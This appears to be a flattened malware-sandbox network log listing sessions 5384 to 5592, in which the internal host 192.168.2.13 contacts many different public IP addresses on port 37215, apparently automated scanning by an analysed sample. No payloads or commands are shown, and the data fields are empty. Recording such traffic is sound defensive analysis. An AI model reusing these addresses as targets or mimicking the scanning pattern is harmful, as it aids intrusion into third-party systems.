                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5384192.168.2.133722241.168.146.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5385192.168.2.1339870157.39.76.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5386192.168.2.1348074157.33.31.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5387192.168.2.134480041.228.54.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5388192.168.2.133532041.101.194.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5389192.168.2.1349766157.25.212.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5390192.168.2.1333190197.214.124.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5391192.168.2.1335406157.16.170.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5392192.168.2.1358726197.161.153.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5393192.168.2.1349038197.27.91.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5394192.168.2.1335302118.133.248.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5395192.168.2.1357726197.19.53.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5396192.168.2.134563041.51.8.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5397192.168.2.135622641.197.10.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5398192.168.2.135029424.61.81.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5399192.168.2.1357762107.248.95.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5400192.168.2.134954241.196.10.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5401192.168.2.135412878.113.218.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5402192.168.2.1358510197.60.191.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5403192.168.2.133404841.176.156.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5404192.168.2.134933895.72.3.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5405192.168.2.1355308213.186.238.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5406192.168.2.133529841.194.83.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5407192.168.2.1360910197.168.251.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5408192.168.2.1341422114.82.179.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5409192.168.2.1356262197.225.112.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5410192.168.2.134057841.45.190.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5411192.168.2.135231673.44.154.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5412192.168.2.135785641.8.5.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5413192.168.2.1350608157.100.121.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5414192.168.2.135984641.197.245.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5415192.168.2.1336802197.87.120.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5416192.168.2.1338442157.146.77.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5417192.168.2.134941241.77.132.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5418192.168.2.1349926197.137.240.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5419192.168.2.1349784197.184.71.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5420192.168.2.135886441.166.69.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5421192.168.2.1345014157.30.64.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5422192.168.2.1333230171.146.12.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5423192.168.2.1348296157.223.213.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5424192.168.2.134973841.216.154.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5425192.168.2.134241219.155.210.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5426192.168.2.1360158197.68.235.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5427192.168.2.1338014181.160.70.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5428192.168.2.134934841.117.148.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5429192.168.2.1336700157.209.61.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5430192.168.2.1338286197.235.213.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5431192.168.2.1337598121.50.76.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5432192.168.2.136088241.92.16.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5433192.168.2.1335560197.239.162.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5434192.168.2.1350652197.81.129.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5435192.168.2.133439841.83.217.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5436192.168.2.1358856197.105.157.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5437192.168.2.1346414197.251.84.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5438192.168.2.133926641.90.131.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5439192.168.2.1359582197.21.191.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5440192.168.2.1350582196.100.190.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5441192.168.2.133336841.50.201.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5442192.168.2.1353160128.171.71.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5443192.168.2.135492041.178.209.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5444192.168.2.133355241.220.48.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5445192.168.2.1356034157.177.73.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5446192.168.2.133866641.61.140.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5447192.168.2.1347894157.48.19.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5448192.168.2.1334376157.228.80.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5449192.168.2.1343018197.206.106.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5450192.168.2.1337570157.32.18.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5451192.168.2.134390841.30.167.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5452192.168.2.1346962126.170.137.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5453192.168.2.1341690217.251.178.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5454192.168.2.134831441.235.97.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5455192.168.2.1334540173.66.2.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5456192.168.2.1341238157.122.113.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5457192.168.2.135179637.59.123.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5458192.168.2.1333676157.130.143.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5459192.168.2.1344508108.25.240.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5460192.168.2.1347968157.195.113.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5461192.168.2.1341104188.202.12.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5462192.168.2.135966441.191.38.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5463192.168.2.134795038.95.58.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5464192.168.2.1355034197.203.34.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5465192.168.2.1357794197.39.217.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5466192.168.2.135731041.0.216.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5467192.168.2.133524241.28.113.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5468192.168.2.135113241.108.89.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5469192.168.2.1360314157.89.153.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5470192.168.2.1343440157.238.23.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5471192.168.2.1338646197.18.45.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5472192.168.2.133678268.171.245.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5473192.168.2.134904041.1.102.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5474192.168.2.1352366197.131.120.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5475192.168.2.1355882197.109.194.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5476192.168.2.1340164200.53.105.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5477192.168.2.1335928113.84.73.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5478192.168.2.1348564144.204.203.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5479192.168.2.1341790157.30.249.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5480192.168.2.134362841.173.133.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5481192.168.2.1337184197.157.157.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5482192.168.2.133872641.141.250.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5483192.168.2.135764641.9.129.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5484192.168.2.134488041.204.201.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5485192.168.2.1335744197.37.65.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5486192.168.2.134671475.237.124.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5487192.168.2.134442841.144.162.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5488192.168.2.134898652.57.25.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5489192.168.2.133672041.243.25.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5490192.168.2.1340766157.34.201.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5491192.168.2.1336960157.76.150.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5492192.168.2.1334412157.21.76.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5493192.168.2.1337328197.119.90.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5494192.168.2.135496841.28.250.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5495192.168.2.135608841.236.159.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5496192.168.2.1333696190.66.25.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5497192.168.2.135985483.186.65.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5498192.168.2.134084841.39.82.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5499192.168.2.135071041.125.236.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5500192.168.2.1339936197.171.3.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5501192.168.2.1358306197.159.72.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5502192.168.2.1347110197.197.20.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5503192.168.2.1350726157.247.19.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5504192.168.2.1344574197.56.94.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5505192.168.2.133433041.168.199.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5506192.168.2.1349532157.110.28.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5507192.168.2.134812041.69.201.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5508192.168.2.1357192212.202.213.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5509192.168.2.1354288157.219.101.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5510192.168.2.1342772197.245.128.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5511192.168.2.133944841.204.169.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5512192.168.2.1359208157.160.94.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5513192.168.2.1342006157.208.209.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5514192.168.2.134939041.188.73.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5515192.168.2.135792041.85.73.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5516192.168.2.1345738157.227.207.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5517192.168.2.134100641.232.199.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5518192.168.2.1340476110.237.236.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5519192.168.2.1347002157.99.115.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5520192.168.2.133345641.130.252.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5521192.168.2.1343236197.40.97.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5522192.168.2.1348556197.123.98.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5523192.168.2.133605841.186.109.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5524192.168.2.1355776157.187.40.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5525192.168.2.133288041.6.134.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5526192.168.2.1345494157.3.9.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5527192.168.2.1339058197.144.11.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5528192.168.2.1345862197.238.254.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5529192.168.2.1332972197.220.25.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5530192.168.2.135218841.173.186.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5531192.168.2.135643283.204.34.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5532192.168.2.135395490.19.54.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5533192.168.2.1352684197.14.120.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5534192.168.2.1343230196.161.118.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5535192.168.2.1341570197.201.233.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5536192.168.2.1341032197.62.224.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5537192.168.2.1344320157.224.25.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5538192.168.2.1353142184.6.254.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5539192.168.2.1335100197.52.3.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5540192.168.2.1352996157.102.16.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5541192.168.2.1360758157.130.218.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5542192.168.2.1341524157.126.82.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5543192.168.2.1351106197.126.241.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5544192.168.2.1358102197.185.151.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5545192.168.2.1350152147.146.194.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5546192.168.2.133352041.66.157.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5547192.168.2.134669241.83.53.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5548192.168.2.1351696197.220.182.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5549192.168.2.1353150197.136.149.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5550192.168.2.1340852157.26.0.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5551192.168.2.136035641.105.122.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5552192.168.2.1352494157.177.149.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5553192.168.2.134324084.207.186.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5554192.168.2.1346500198.121.229.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5555192.168.2.1343148157.211.37.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5556192.168.2.1343740197.168.28.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5557192.168.2.134841441.84.249.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5558192.168.2.1337032197.15.38.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5559192.168.2.1352300197.24.233.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5560192.168.2.1348334157.29.135.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5561192.168.2.1346790157.32.151.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5562192.168.2.1341254139.178.211.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5563192.168.2.1335864197.61.230.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5564192.168.2.133295641.202.177.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5565192.168.2.134741041.238.95.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5566192.168.2.1354130183.160.109.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5567192.168.2.1341496157.253.65.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5568192.168.2.134319441.226.243.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5569192.168.2.1343686197.162.194.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5570192.168.2.135811241.184.91.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5571192.168.2.1333012197.212.186.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5572192.168.2.1356842157.132.57.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5573192.168.2.136044441.62.49.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5574192.168.2.1352328197.6.23.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5575192.168.2.1348034157.133.26.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5576192.168.2.1344852157.105.197.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5577192.168.2.1342508197.149.239.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5578192.168.2.1347270177.140.227.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5579192.168.2.1351250157.111.22.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5580192.168.2.1353806185.10.220.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5581192.168.2.1334216157.100.119.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5582192.168.2.1338012157.126.65.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5583192.168.2.1360606157.158.241.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5584192.168.2.1345020185.98.248.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5585192.168.2.135236041.84.21.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5586192.168.2.135637041.2.5.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5587192.168.2.1340702157.145.120.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5588192.168.2.1346678197.163.218.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5589192.168.2.1347756197.78.42.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5590192.168.2.1356930195.17.210.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5591192.168.2.134094251.239.118.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5592192.168.2.134372241.123.143.19637215
                                                  TimestampBytes transferredDirectionData


